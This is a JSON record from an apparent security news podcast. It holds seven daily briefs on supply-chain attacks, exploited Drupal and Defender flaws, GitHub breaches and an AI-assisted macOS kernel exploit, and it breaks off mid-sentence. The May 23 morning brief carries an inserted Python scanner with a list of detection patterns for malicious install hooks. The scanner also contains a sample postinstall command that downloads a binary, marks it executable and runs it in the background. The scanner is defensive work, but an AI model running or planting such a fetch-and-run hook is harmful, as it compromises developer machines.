[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"podcast-episodes":3},[4,14,21,29,35,43,50],{"id":5,"date":6,"edition":7,"title":8,"article_text":9,"audio_url":10,"duration_seconds":11,"article_count":12,"created_at":13},"a2205597-1f75-4aae-82c9-efae2b8608c1","2026-05-24","afternoon","ThreatNoir Weekend Brief — May 24","# Afternoon Review in IT Security — May 24, 2026\n\nThe cybersecurity landscape continues to face escalating threats from both legacy vulnerabilities and sophisticated supply chain attacks. Today's threat intelligence reveals active exploitation campaigns targeting IoT devices, coordinated malicious package distribution across multiple ecosystems, and widespread attacks on development infrastructure, underscoring the persistent risk to organizations across all technology stacks.\n\n## RondoDox Botnet Exploits Critical 2018 Vulnerability to Hijack ASUS Routers\n\nVulnCheck researchers have identified an active campaign in which the RondoDox botnet is leveraging CVE-2018-5999, a critical vulnerability from 2018, to compromise over one million ASUS routers. The vulnerability permits attackers to bypass authentication mechanisms and gain unauthorized access to affected devices. Source: [RondoDox Botnet Exploits Critical 2018 Vulnerability to Hijack ASUS Routers](https:\u002F\u002Fhackread.com\u002Frondodox-botnet-2018-vulnerability-hijack-asus-routers\u002F)\n\nThis campaign demonstrates the continued risk posed by unpatched legacy vulnerabilities in widely deployed consumer networking equipment. 
Organizations and end users relying on ASUS routers should prioritize firmware updates and implement network segmentation to limit the potential impact of compromised devices.\n\n## Malicious Postinstall Hook Found Across 700+ GitHub Repositories, Including Packagist and Node.js Projects\n\nSocket researchers have uncovered a coordinated supply chain attack affecting over 700 GitHub repositories through malicious postinstall hooks embedded in package.json files. Eight Composer packages hosted on Packagist were compromised with identical malicious scripts that download and execute a binary named gvfsd-network from attacker-controlled GitHub Releases, writing it to \u002Ftmp\u002F.sshd with suppressed error output and background execution. Source: [Malicious Postinstall Hook Found Across 700+ GitHub Repositories, Including Packagist and Node.js Projects](https:\u002F\u002Fsocket.dev\u002Fblog\u002Fmalicious-postinstall-hook-found-across-700-github-repos?utm_medium=feed)\n\nThe attack is particularly concerning because the malicious code was placed in package.json rather than composer.json, targeting repositories that bundle JavaScript build tooling alongside PHP code. This cross-ecosystem placement allows the attack to evade defenders who focus exclusively on Composer metadata while overlooking JavaScript lifecycle scripts. The malicious script uses curl with disabled TLS certificate verification (curl -k), downloads an unauthenticated remote binary, and executes it immediately during installation with no integrity checking. Two affected packages—devdojo\u002Fwave with 6,400 GitHub stars and devdojo\u002Fgenesis with 9,100 Packagist installs—represent the highest risk due to their use as Laravel starter kits, where the malicious package.json lands at the project root and executes during npm install. 
The attacker infrastructure centered on the GitHub account parikhpreyash4 suggests a broader campaign, with hundreds of additional references detected across Node.js repositories, though the full scope remains unconfirmed.\n\n## 5,561 GitHub Repositories Hit by Megalodon Supply Chain Attack in Six Hours\n\nSafeDep has disclosed the Megalodon attack, which compromised 5,561 GitHub repositories in just six hours through malicious CI workflows designed to steal cloud credentials. The attack employed two malware variants, Optimize-Build and SysDiag, targeting development infrastructure at scale. Source: [5,561 GitHub Repositories Hit by Megalodon Supply Chain Attack in Six Hours](https:\u002F\u002Fhackread.com\u002Fgithub-repositories-megalodon-supply-chain-attack\u002F)\n\nThis campaign highlights the speed and scale at which modern supply chain attacks can propagate through development platforms, with attackers leveraging CI\u002FCD pipeline abuse to extract sensitive cloud credentials from compromised repositories.\n\n## Drupal: Critical SQL Injection Flaw Now Targeted in Attacks\n\nDrupal has issued a warning that a highly critical SQL injection vulnerability announced earlier this week is now being actively exploited in the wild. The flaw, tracked as CVE-2026-9082, presents a significant risk to Drupal installations that have not yet applied available patches. 
Source: [Drupal: Critical SQL Injection Flaw Now Targeted in Attacks](https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fdrupal-critical-sql-injection-flaw-now-targeted-in-attacks\u002F)\n\nOrganizations operating Drupal instances should treat this vulnerability with the highest priority and apply security updates immediately to prevent unauthorized database access and potential system compromise.\n\nThe convergence of these threats—from legacy IoT vulnerabilities to sophisticated supply chain attacks targeting both package repositories and CI\u002FCD infrastructure—underscores the need for comprehensive security strategies spanning network segmentation, dependency auditing, and continuous monitoring of development pipelines.\n","https:\u002F\u002Fcdn.threatnoir.com\u002Fpodcasts\u002F2026-05-24\u002Fthreatnoir-afternoon-brief-2026-05-24.mp3",138,4,"2026-05-24T13:17:35.768572+00:00",{"id":15,"date":6,"edition":16,"title":8,"article_text":17,"audio_url":18,"duration_seconds":19,"article_count":12,"created_at":20},"5c564e08-47be-4b62-b807-1089c52c2468","morning","# Morning Review in IT Security — May 24, 2026\n\nThe cybersecurity landscape continues to face escalating threats as multiple critical incidents emerge across global organizations. From messaging platform vulnerabilities to government agency breaches, today's threat intelligence reveals a pattern of sophisticated attacks targeting both commercial and public sector entities.\n\n## WhatsApp Zero-Day Exploit Advertised for Sale\n\nA threat actor operating on an underground forum is claiming to offer a WhatsApp zero-day exploit for sale. According to the threat actor's claims, the exploit is capable of installing malware or backdoors through private messages and reportedly functions on multiple phone platforms. 
Source: [DarkWebInformer](https:\u002F\u002Fx.com\u002FDarkWebInformer\u002Fstatus\u002F2058257939362627626)\n\nThe claim is unverified, but if the exploit works as advertised, a message-delivered chain of this kind would let an attacker compromise a handset with little or no action from the victim, which makes it a significant concern for the billions of WhatsApp users worldwide.\n\n## WisERP Customer Records Auctioned Following Alleged Breach\n\nApproximately 1.5 million U.S. customer records allegedly belonging to WisERP users have been advertised in an auction on dark web forums. The breach, which has not been independently confirmed, would affect Enterprise Resource Planning customers across the United States. Source: [DarkWebInformer](https:\u002F\u002Fx.com\u002FDarkWebInformer\u002Fstatus\u002F2058212320468193384)\n\nThe exposure of ERP system data poses particular concern due to the sensitive nature of business operations and financial information typically stored within such platforms.\n\n## Chilean Fire Department System Compromised\n\nThe VIPER Platform operated by the Chilean Fire Department has allegedly been breached, with internal records and documents exposed to threat actors. This incident affects critical infrastructure responsible for emergency response operations in Chile. Source: [DarkWebInformer](https:\u002F\u002Fx.com\u002FDarkWebInformer\u002Fstatus\u002F2058217725382561879)\n\nThe compromise of emergency services infrastructure underscores the expanding scope of cyberattacks targeting government agencies and public safety systems.\n\n## South African Revenue Service Data Breach Attributed to Nullsec\n\nThe South African Revenue Service (SARS) has allegedly fallen victim to a data breach attributed to the Nullsec threat group. This breach of a government financial institution raises concerns regarding sensitive taxpayer information and national economic security. 
Source: [DarkWebInformer](https:\u002F\u002Fx.com\u002FDarkWebInformer\u002Fstatus\u002F2058214877831762189)\n\nToday's threat landscape demonstrates that threat actors continue to target high-value assets across government, financial, and commercial sectors with increasing frequency and sophistication. Organizations should prioritize vulnerability patching, incident response readiness, and threat intelligence monitoring to mitigate these evolving risks.\n","https:\u002F\u002Fcdn.threatnoir.com\u002Fpodcasts\u002F2026-05-24\u002Fthreatnoir-morning-brief-2026-05-24.mp3",148,"2026-05-24T03:11:59.204472+00:00",{"id":22,"date":23,"edition":7,"title":24,"article_text":25,"audio_url":26,"duration_seconds":27,"article_count":12,"created_at":28},"fcadddd2-035e-45b1-b827-859348020a68","2026-05-23","ThreatNoir Weekend Brief — May 23","# Afternoon Review in IT Security — May 23, 2026\n\nThe cybersecurity landscape continues to face mounting pressure from multiple fronts on May 23, 2026. Critical vulnerabilities in widely deployed hardware, zero-day exploits affecting major operating systems, supply chain compromises targeting development tools, and the emerging impact of artificial intelligence on open source ecosystems all demand immediate attention from security professionals and organizations worldwide.\n\n## RondoDox Botnet Exploits Critical 2018 Vulnerability to Hijack ASUS Routers\n\nCybersecurity researchers at VulnCheck have uncovered an active exploitation campaign leveraging a critical 2018 vulnerability to compromise over a million ASUS routers globally. The RondoDox botnet is actively exploiting CVE-2018-5999 to bypass authentication mechanisms and gain unauthorized access to vulnerable devices. The campaign demonstrates how legacy vulnerabilities continue to pose significant threats when patches remain undeployed across large installed bases. 
Source: [Hackread](https:\u002F\u002Fhackread.com\u002Frondodox-botnet-2018-vulnerability-hijack-asus-routers\u002F)\n\nThis incident underscores the persistent risk posed by unpatched network infrastructure. Organizations and individual users operating ASUS routers should prioritize immediate firmware updates to remediate the identified vulnerability and prevent botnet infection.\n\n## Microsoft Patches Exploited UnDefend and RedSun Defender Zero-Days\n\nMicrosoft has released security patches addressing two actively exploited zero-day vulnerabilities affecting its Defender security products. The vulnerabilities, identified as CVE-2026-41091 and CVE-2026-45498, could allow attackers to escalate privileges to System level or create denial-of-service conditions on compromised systems. The BlueHammer malware has been observed exploiting these flaws in the wild. Source: [SecurityWeek](https:\u002F\u002Fwww.securityweek.com\u002Fmicrosoft-patches-exploited-undefend-and-redsun-defender-zero-days\u002F)\n\nThe exploitation of security software itself represents a critical threat vector, as it undermines the defensive infrastructure organizations depend upon. Immediate patching of all Defender installations is essential to prevent privilege escalation and system compromise.\n\n## GitHub Links Repository Breach to TanStack npm Supply-Chain Attack\n\nGitHub has confirmed that the breach of 3,800 internal repositories was facilitated through a malicious version of the Nx Console VS Code extension, which was compromised during last week's TanStack npm supply-chain attack. The attack chain demonstrates how vulnerabilities in development tools can cascade through the supply chain to compromise major technology platforms. 
Source: [BleepingComputer](https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fgithub-links-repo-breach-to-tanstack-npm-supply-chain-attack\u002F)\n\nThis incident highlights the critical importance of vetting third-party development extensions and maintaining rigorous monitoring of supply chain dependencies. Organizations should conduct comprehensive audits of their development tool ecosystems to identify and remediate similar compromises.\n\n## AI Has Taken Over Open Source\n\nAnalysis of open source package ecosystems reveals that artificial intelligence has fundamentally transformed the production and consumption of software dependencies. Data from Socket's comprehensive package database shows an unprecedented surge in npm package creation beginning in January 2026, with AI-generated packages now accounting for over 30 percent of new submissions based on stylistic markers. This exponential growth has been accompanied by significant changes in maintainer-contributor dynamics, with open source maintainers increasingly reporting negative experiences with low-quality automated pull requests. Source: [Socket](https:\u002F\u002Fsocket.dev\u002Fblog\u002Fai-has-taken-over-open-source?utm_medium=feed)\n\nThe shift toward AI-driven package creation and dependency selection has created a largely opaque software supply chain where human review is no longer feasible at scale. While AI-generated code often meets functional requirements and selected dependencies frequently outperform human choices, the automated nature of these decisions has created new security risks. 
The software supply chain has effectively become a black box, necessitating a fundamental shift toward automated analysis and behavioral monitoring of third-party code as the primary defense mechanism against supply chain attacks.\n\nAs artificial intelligence continues to reshape open source development practices, security teams must adapt their strategies to accommodate automated package generation, selection, and installation at unprecedented scale. Manual review processes are no longer viable, making automated scanning and risk assessment tools essential components of any production security posture.\n","https:\u002F\u002Fcdn.threatnoir.com\u002Fpodcasts\u002F2026-05-23\u002Fthreatnoir-afternoon-brief-2026-05-23.mp3",147,"2026-05-23T13:17:16.724387+00:00",{"id":30,"date":23,"edition":16,"title":24,"article_text":31,"audio_url":32,"duration_seconds":33,"article_count":12,"created_at":34},"f69c86ea-a6c8-4604-b50c-1f472e81569c","# Morning Review in IT Security — May 23, 2026\n\nThe security landscape on May 23, 2026, presents a critical convergence of supply chain threats and active exploitation campaigns. Researchers have identified coordinated attacks spanning multiple ecosystems, from PHP package repositories to GitHub workflows, while active exploitation of newly disclosed vulnerabilities continues to accelerate.\n\n## Malicious Postinstall Hook Detected Across 700+ GitHub Repositories\n\nSocket researchers have uncovered a coordinated supply chain campaign affecting eight Composer packages whose upstream repositories were modified to include identical malicious postinstall scripts. The attack demonstrates a sophisticated cross-ecosystem targeting strategy, as the malicious code was inserted into package.json rather than composer.json, potentially evading detection by developers and security teams focused solely on PHP dependency metadata. 
This placement is particularly dangerous because developers reviewing Composer packages may overlook JavaScript lifecycle hooks bundled within the same repository.\n\nThe malicious postinstall script downloads a Linux binary named gvfsd-network from an attacker-controlled GitHub Releases URL, writes it to \u002Ftmp\u002F.sshd, makes it executable, and runs it in the background. The command disables TLS certificate verification using curl -k, suppresses error output, and disguises the executable under a system-like filename. The affected packages include moritz-sauer-13\u002Fsilverstripe-cms-theme, crosiersource\u002Fcrosierlib-base, devdojo\u002Fwave, devdojo\u002Fgenesis, katanaui\u002Fkatana, elitedevsquad\u002Fsidecar-laravel, r2luna\u002Fbrain, and baskarcm\u002Ftzi-chat-ui. GitHub code searches revealed hundreds of additional references tied to the same attacker infrastructure, suggesting the campaign extends far beyond the confirmed Packagist findings.\n\nThe most significant exposure exists in starter kit projects, particularly devdojo\u002Fwave with approximately 6,400 GitHub stars and 9,100 Packagist installs. When developers clone these repositories, the malicious package.json lands at the project root, where npm install executes the postinstall script directly. Socket has recommended that teams using Packagist packages containing JavaScript build tooling inspect bundled package.json files alongside composer.json, with heightened vigilance for branch-tracking dependencies where package contents can change as upstream branches evolve. 
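The scanner below is an added example, not Socket's tooling or anything from the affected projects: it walks a checkout for package.json files, including ones bundled inside PHP packages under vendor/, and scores the npm lifecycle hooks (preinstall, install, postinstall, prepare) against the indicators described in this brief and in the May 24 afternoon brief, such as curl -k, a GitHub Releases download URL, a dotfile under /tmp, chmod +x, suppressed stderr and backgrounding. The sample hook it runs against is constructed to mirror the described behaviour and is not the real payload; the indicator list, the weights and the example package names are assumptions.

```python
import json
import os
import sys
import tempfile
from dataclasses import dataclass, field

# npm lifecycle hooks that run automatically during install (assumption: the
# installer is not using --ignore-scripts).
LIFECYCLE_HOOKS = ('preinstall', 'install', 'postinstall', 'prepare')

# Substring indicators and weights. The list is an assumption drawn from the
# behaviour described in the Socket write-up plus common loader idioms.
INDICATORS = (
    ('curl -k', 3, 'curl with TLS certificate verification disabled'),
    ('--insecure', 3, 'curl with TLS certificate verification disabled'),
    ('--no-check-certificate', 3, 'wget with TLS certificate verification disabled'),
    ('/releases/download/', 2, 'downloads a binary from a GitHub Releases URL at install time'),
    ('/tmp/.', 3, 'writes a dotfile under /tmp (hidden staging path)'),
    ('chmod +x', 2, 'marks a downloaded file executable'),
    ('2>/dev/null', 1, 'suppresses error output'),
    ('| sh', 3, 'pipes fetched content into a shell'),
    ('| bash', 3, 'pipes fetched content into a shell'),
    ('base64 -d', 2, 'decodes an embedded payload'),
    ('nohup ', 2, 'detaches a process from the installer session'),
)

@dataclass
class Finding:
    path: str                # the package.json that carries the hook
    hook: str                # which lifecycle script matched
    score: int               # sum of indicator weights
    reasons: list = field(default_factory=list)

def scan_scripts(pkg: dict, path: str = 'package.json') -> list:
    # Scores each lifecycle hook in one parsed package.json.
    findings = []
    scripts = pkg.get('scripts') or {}
    for hook in LIFECYCLE_HOOKS:
        script = scripts.get(hook)
        if not isinstance(script, str):
            continue
        lowered = script.lower()
        score, reasons = 0, []
        for needle, weight, why in INDICATORS:
            if needle in lowered and why not in reasons:
                score += weight
                reasons.append(why)
        # A trailing ampersand backgrounds the loader so the install finishes cleanly.
        if lowered.rstrip().endswith('&') or ' & ' in lowered:
            score += 2
            reasons.append('runs the command in the background')
        if score:
            findings.append(Finding(path, hook, score, reasons))
    return findings

def scan_tree(root: str) -> list:
    # Walks a checkout. vendor/ is deliberately included because the campaign
    # placed package.json inside Composer packages; node_modules is skipped
    # because it holds installed, not vendored, content.
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in ('.git', 'node_modules')]
        if 'package.json' not in filenames:
            continue
        full = os.path.join(dirpath, 'package.json')
        try:
            with open(full, encoding='utf-8') as fh:
                pkg = json.load(fh)
        except (OSError, ValueError):
            continue
        if isinstance(pkg, dict):
            findings.extend(scan_scripts(pkg, full))
    return findings

# Constructed samples (not the real payload): one hook modelled on the described
# loader, one ordinary postinstall as found in many legitimate packages.
SUSPICIOUS = {
    'name': 'example-starter-kit',
    'scripts': {
        'build': 'vite build',
        'postinstall': 'curl -k -sL https://github.com/example/example/releases/download/v1/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd >/dev/null 2>&1 &',
    },
}
BENIGN = {'name': 'ok-theme', 'scripts': {'postinstall': 'husky install', 'build': 'vite build'}}

def demo() -> list:
    # Writes both samples into a throwaway tree (the benign one under vendor/)
    # and scans it, so the walker is exercised without touching a real checkout.
    with tempfile.TemporaryDirectory() as root:
        for sub, pkg in (('starter-kit', SUSPICIOUS), ('vendor/acme/theme', BENIGN)):
            d = os.path.join(root, sub)
            os.makedirs(d)
            with open(os.path.join(d, 'package.json'), 'w', encoding='utf-8') as fh:
                json.dump(pkg, fh)
        return scan_tree(root)

if __name__ == '__main__':
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for f in sorted(results, key=lambda x: -x.score):
        print(f'{f.path} [{f.hook}] score={f.score}: ' + '; '.join(f.reasons))
```

Run it as python scan_hooks.py path/to/checkout before the first npm install. A non-zero score is a reason to read the script by hand, not proof of compromise, and the reverse also holds: a hook that hides its loader behind an obfuscated node -e one-liner will not match these substrings, so pair the check with npm install --ignore-scripts in CI and review lifecycle scripts on every dependency bump, especially for branch-tracking dependencies whose contents change as the upstream branch moves.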
Source: [Malicious Postinstall Hook Found Across 700+ GitHub Repositories, Including Packagist and Node.js Projects](https:\u002F\u002Fsocket.dev\u002Fblog\u002Fmalicious-postinstall-hook-found-across-700-github-repos?utm_medium=feed)\n\n## Drupal Core SQL Injection Vulnerability Added to CISA KEV Catalog\n\nThe Cybersecurity and Infrastructure Security Agency has added Drupal core SQL injection vulnerability CVE-2026-9082 to its Known Exploited Vulnerabilities catalog, signaling official recognition of the threat. CISA adds a CVE to the KEV catalog only when it has evidence of active exploitation, and under Binding Operational Directive 22-01 federal civilian agencies must remediate listed vulnerabilities by a set deadline; other organizations should read the listing as the same signal to patch immediately. Source: [RT @CISACyber: 🛡️ We added Drupal core SQL injection vulnerability CVE-2026-9082 to our KEV Cata...](https:\u002F\u002Fx.com\u002FCISAgov\u002Fstatus\u002F2057893782339592352)\n\n## Drupal SQL Injection Flaw Now Under Active Attack\n\nSecurity researchers have confirmed that threat actors are actively exploiting the Drupal SQL injection vulnerability, CVE-2026-9082, which has been classified as highly critical. The rapid transition from disclosure to active exploitation underscores the urgency of patching, as attackers have already begun leveraging this flaw in real-world attacks. Organizations running Drupal installations should prioritize immediate remediation to prevent unauthorized database access and potential data exfiltration. Source: [Drupal: Critical SQL injection flaw now targeted in attacks](https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fdrupal-critical-sql-injection-flaw-now-targeted-in-attacks\u002F)\n\n## Megalodon Supply Chain Attack Compromises 5,561 GitHub Repositories in Six Hours\n\nSafeDep researchers have documented a large-scale supply chain attack designated Megalodon that targeted 5,561 GitHub repositories with malicious CI workflows and cloud credential theft mechanisms within a six-hour window. 
The attack demonstrates the velocity and scale at which modern supply chain threats can propagate, leveraging GitHub's CI\u002FCD infrastructure to distribute malicious payloads. It involved malicious artifacts tracked as Optimize-Build and SysDiag, which attempted to harvest cloud credentials and establish persistence within compromised development environments. This incident underscores the critical need for organizations to implement strict controls over CI\u002FCD pipeline configurations and monitor for unauthorized workflow modifications. Source: [5,561 GitHub Repositories Hit by Megalodon Supply Chain Attack in Six Hours](https:\u002F\u002Fhackread.com\u002Fgithub-repositories-megalodon-supply-chain-attack\u002F)\n\nThe convergence of these threats—from cross-ecosystem package poisoning to exploitation of freshly disclosed flaws and massive CI\u002FCD compromises—reflects an increasingly sophisticated threat landscape targeting the software supply chain. Organizations must implement layered defenses including dependency scanning, workflow auditing, and rapid patching protocols to mitigate these interconnected risks.\n","https:\u002F\u002Fcdn.threatnoir.com\u002Fpodcasts\u002F2026-05-23\u002Fthreatnoir-morning-brief-2026-05-23.mp3",166,"2026-05-23T03:11:57.576058+00:00",{"id":36,"date":37,"edition":7,"title":38,"article_text":39,"audio_url":40,"duration_seconds":41,"article_count":12,"created_at":42},"2e04d93b-929f-4673-8d60-984ea4415916","2026-05-22","ThreatNoir Afternoon Brief — May 22","# Afternoon Review in IT Security — May 22, 2026\n\nThe cybersecurity landscape continues to evolve with increasing sophistication in attack methodologies. 
Today's threat landscape reveals critical vulnerabilities in enterprise infrastructure, widespread supply chain compromises, and the accelerating role of artificial intelligence in enabling faster exploitation of security weaknesses.\n\n## Hackers Bypass SonicWall VPN MFA Due to Incomplete Patching\n\nThreat actors have successfully exploited SonicWall Gen6 SSL-VPN appliances by brute-forcing VPN credentials and bypassing multi-factor authentication to deploy ransomware attack tools. The vulnerability, tracked as CVE-2024-12802, remains exploitable on systems that have not received complete security patches. Attackers leveraged this access to deploy Cobalt Strike, a widely-used post-exploitation framework, enabling lateral movement and data exfiltration within compromised networks. Source: [Hackers bypass SonicWall VPN MFA due to incomplete patching](https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fhackers-bypass-sonicwall-vpn-mfa-due-to-incomplete-patching\u002F)\n\nThe incident underscores the critical importance of comprehensive patching strategies. Organizations relying on SonicWall VPN infrastructure must prioritize immediate verification that all systems have received complete security updates, as partial patching leaves the authentication bypass vulnerability intact. Because the attackers brute-forced valid VPN credentials, patching alone is not enough: passwords for local VPN accounts should be reset and MFA enrollment re-verified after the update, since credentials captured before the fix remain valid on a patched appliance.\n\n## GitHub Breach: TeamPCP Steals 3,800 Repositories via VS Code Extension\n\nA threat actor group known as TeamPCP has compromised GitHub by distributing a malicious Visual Studio Code extension that harvested internal repository credentials from developer machines. The breach resulted in the theft of approximately 3,800 internal repositories, which the attackers are now offering for sale online at a price of $95,000. The malware, identified as Mini Shai-Hulud, demonstrates the evolving sophistication of supply chain attacks targeting the developer ecosystem. 
Source: [GitHub Breach: TeamPCP Steals 3,800 Repositories via VS Code Extension](https:\u002F\u002Fhackread.com\u002Fgithub-breach-teampcp-repositories-vs-code-extension\u002F)\n\nThis incident highlights the vulnerability of integrated development environments and the trust developers place in third-party extensions. Organizations should implement controls to monitor and restrict VS Code extension installations, particularly in environments with access to sensitive code repositories.\n\n## Verizon DBIR: AI Helped Hackers Exploit Vulnerabilities in 31% of Recent Breaches\n\nThe Verizon Data Breach Investigations Report for 2026 reveals a significant shift in attack vectors, with software vulnerabilities now surpassing stolen passwords as the primary exploitation method. Artificial intelligence has accelerated the speed at which attackers can identify and exploit security flaws, with some vulnerabilities being weaponized within hours of discovery. The report indicates that AI assistance played a role in 31 percent of recent breaches examined. Source: [Verizon DBIR: AI Helped Hackers Exploit Vulnerabilities in 31% of Recent Breaches](https:\u002F\u002Fhackread.com\u002Fverizon-dbir-ai-hackers-exploit-vulnerabilities-breaches\u002F)\n\nThis trend signals a fundamental change in the threat landscape where vulnerability management has become more critical than ever. Organizations must accelerate patch deployment cycles and implement robust vulnerability assessment programs to maintain security posture against AI-assisted attackers.\n\n## Banana RAT Malware in Fake Invoices Hits Customers at 16 Brazilian Banks\n\nA remote access trojan known as Banana RAT has been deployed against customers of 16 Brazilian financial institutions through social engineering campaigns featuring fake invoices and fraudulent security update notifications. The malware, encrypted using the FastAPI crypter tool, steals sensitive customer data and facilitates QR code fraud schemes. 
Infrastructure associated with the campaign includes the domain convitemundial2026.com. Source: [Banana RAT Malware in Fake Invoices Hits Customers at 16 Brazilian Banks](https:\u002F\u002Fhackread.com\u002Fbanana-rat-malware-fake-invoices-16-brazilian-banks\u002F)\n\nThe targeting of banking customers demonstrates the continued effectiveness of social engineering in credential theft and system compromise. Financial institutions should reinforce customer awareness training regarding unsolicited communications and implement technical controls to detect and block known malware families associated with this campaign.\n\nThe convergence of incomplete patching practices, supply chain vulnerabilities, AI-accelerated exploitation, and sophisticated social engineering represents a multifaceted threat environment requiring comprehensive defensive strategies across technical, procedural, and human factors.\n","https:\u002F\u002Fcdn.threatnoir.com\u002Fpodcasts\u002F2026-05-22\u002Fthreatnoir-afternoon-brief-2026-05-22.mp3",137,"2026-05-22T13:17:12.063943+00:00",{"id":44,"date":37,"edition":16,"title":45,"article_text":46,"audio_url":47,"duration_seconds":48,"article_count":12,"created_at":49},"4c163f67-a2c4-4777-8af7-dc6390b8a7fc","ThreatNoir Morning Brief — May 22","# Morning Review in IT Security — May 22, 2026\n\nToday's threat landscape reveals critical vulnerabilities across multiple platforms, from cloud infrastructure delays to kernel exploits and supply-chain compromises. Organizations face mounting pressure to patch zero-days and secure API credentials as threat actors leverage both traditional exploitation and AI-assisted vulnerability discovery.\n\n## Deleted Google API Keys Remain Active up to 23 Minutes, Study Finds\n\nA significant security gap has been identified in Google Cloud Platform's API key management system. 
When developers delete API keys, the credentials continue to function for up to 23 minutes before being fully revoked, creating an extended window of exposure for attackers. This propagation delay affects multiple Google services including GCP, Gemini, BigQuery, and Maps, potentially allowing unauthorized access to sensitive data and resources. The delay in credential invalidation is a real risk for organizations that discover a compromised key and attempt immediate remediation: responders should treat deletion as the start of revocation rather than its completion, and keep watching usage logs for the key until the window has closed. Source: [Deleted Google API Keys Remain Active up to 23 Minutes, Study Finds](https:\u002F\u002Fhackread.com\u002Fdeleted-google-api-keys-active-23-minutes\u002F)\n\n## macOS Kernel Memory Corruption Exploit - Schneier on Security\n\nResearchers have discovered a kernel memory corruption vulnerability affecting Apple's M5 processor architecture, with the exploitation technique developed using Anthropic's Mythos AI model. The use of advanced AI systems to identify and weaponize zero-day vulnerabilities marks a concerning escalation in what AI assistance can achieve. This incident demonstrates how AI-assisted security research can be repurposed for offensive operations, creating novel attack vectors against macOS systems. Source: [macOS Kernel Memory Corruption Exploit - Schneier on Security](https:\u002F\u002Fwww.schneier.com\u002Fblog\u002Farchives\u002F2026\u002F05\u002Fmacos-kernel-memory-corruption-exploit.html)\n\n## Microsoft Patches Exploited UnDefend and RedSun Defender Zero-Days\n\nMicrosoft has released patches addressing two actively exploited zero-day vulnerabilities tracked as CVE-2026-41091 and CVE-2026-45498, both affecting Windows Defender components. The vulnerabilities could allow attackers to escalate privileges to System level or launch denial-of-service attacks against protected systems. The BlueHammer malware has been observed exploiting these flaws in the wild, underscoring the urgency of immediate patching across enterprise environments. 
Source: [Microsoft Patches Exploited UnDefend and RedSun Defender Zero-Days](https:\u002F\u002Fwww.securityweek.com\u002Fmicrosoft-patches-exploited-undefend-and-redsun-defender-zero-days\u002F)\n\n## GitHub Links Repository Breach to TanStack npm Supply-Chain Attack\n\nGitHub has confirmed that attackers who breached 3,800 internal repositories gained initial access through a compromised version of the Nx Console VS Code extension, version 18.95.0. The malicious extension was distributed as part of last week's TanStack npm supply-chain attack, giving the threat actors the access from which the internal repositories were taken. This incident illustrates how supply-chain compromises targeting development tools can cascade into breaches of high-value targets, affecting both the platform and downstream users. Source: [GitHub links repo breach to TanStack npm supply-chain attack](https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fgithub-links-repo-breach-to-tanstack-npm-supply-chain-attack\u002F)\n\nToday's security incidents underscore the need for rapid patch deployment, careful credential management, and heightened vigilance around development tool integrity. Organizations should prioritize addressing these vulnerabilities while conducting supply-chain audits of their development dependencies.\n","https:\u002F\u002Fcdn.threatnoir.com\u002Fpodcasts\u002F2026-05-22\u002Fthreatnoir-morning-brief-2026-05-22.mp3",167,"2026-05-22T03:12:19.916042+00:00",{"id":51,"date":52,"edition":7,"title":53,"article_text":54,"audio_url":55,"duration_seconds":56,"article_count":12,"created_at":57},"2cb67717-30b2-43b4-a178-a206ef548e7d","2026-05-21","ThreatNoir Afternoon Brief — May 21","# Afternoon Review in IT Security — May 21, 2026\n\nThe threat landscape continues to evolve with supply-chain attacks, sophisticated malware campaigns, and AI-assisted exploitation techniques dominating today's security news. 
From compromised development tools to targeted financial sector attacks, organizations face mounting pressure to strengthen their defenses across multiple attack vectors.\n\n## GitHub Links Repository Breach to TanStack npm Supply-Chain Attack\n\nGitHub has confirmed that the breach affecting 3,800 of its internal repositories traces back to a malicious version of the Nx Console VS Code extension, which was compromised during last week's TanStack npm supply-chain attack. The attack demonstrates how a compromised, widely used development tool can cascade into a serious incident at a major platform. Source: [GitHub links repo breach to TanStack npm supply-chain attack](https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fgithub-links-repo-breach-to-tanstack-npm-supply-chain-attack\u002F)\n\n## GitHub Breach: TeamPCP Steals 3,800 Repositories via VS Code Extension\n\nThe threat actor group TeamPCP has claimed responsibility for stealing 3,800 internal repositories from GitHub through the malicious VS Code extension and is now attempting to sell the stolen data online for $95,000. This incident underscores the critical importance of securing development environments and monitoring third-party extensions for suspicious activity. Source: [GitHub Breach: TeamPCP Steals 3,800 Repositories via VS Code Extension](https:\u002F\u002Fhackread.com\u002Fgithub-breach-teampcp-repositories-vs-code-extension\u002F)\n\n## Verizon DBIR: AI Helped Hackers Exploit Vulnerabilities in 31% of Recent Breaches\n\nThe Verizon 2026 Data Breach Investigations Report reveals that software vulnerabilities have overtaken stolen passwords as the primary attack vector in cyberattacks, with artificial intelligence now enabling hackers to exploit identified flaws within hours of discovery. This shift represents a fundamental change in threat actor capabilities and underscores the accelerating pace of modern cyber operations. 
Source: [Verizon DBIR: AI Helped Hackers Exploit Vulnerabilities in 31% of Recent Breaches](https:\u002F\u002Fhackread.com\u002Fverizon-dbir-ai-hackers-exploit-vulnerabilities-breaches\u002F)\n\n## Banana RAT Malware in Fake Invoices Hits Customers at 16 Brazilian Banks\n\nA coordinated malware campaign has deployed Banana RAT through fake invoices and fraudulent security update screens, targeting customers across 16 Brazilian financial institutions. The attack employs QR code fraud tactics to steal sensitive data and demonstrates the continued effectiveness of social engineering combined with advanced remote access trojans. Source: [Banana RAT Malware in Fake Invoices Hits Customers at 16 Brazilian Banks](https:\u002F\u002Fhackread.com\u002Fbanana-rat-malware-fake-invoices-16-brazilian-banks\u002F)\n\nToday's threat intelligence reveals an increasingly sophisticated threat ecosystem where supply-chain vulnerabilities, AI-augmented attacks, and targeted financial sector operations represent the most pressing risks to organizations globally. Security teams must prioritize vulnerability management, third-party software auditing, and advanced threat detection capabilities to effectively counter these evolving 